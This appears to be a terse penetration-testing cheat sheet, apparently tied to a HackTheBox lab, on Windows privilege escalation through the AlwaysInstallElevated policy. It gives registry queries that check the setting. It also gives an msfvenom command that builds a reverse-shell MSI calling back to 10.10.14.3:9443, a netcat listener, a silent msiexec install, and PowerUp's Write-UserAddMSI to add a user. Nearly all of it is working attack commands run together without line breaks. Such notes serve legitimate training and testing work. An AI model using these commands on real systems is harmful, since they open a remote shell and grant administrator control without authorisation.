always-installed-elevated
Enum always install elevated settings
always install elevated settings reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installerreg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installermsfvenom -p windows/shell_reverse_tcp lhost=10.10.14.3 lport=9443 -f msi > aie.msi nc -lnvp 9443msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestartEscalating privileges (after gaining shell)
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedreg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedImport-Module .\PowerUp.ps1Write-UserAddMSILast updated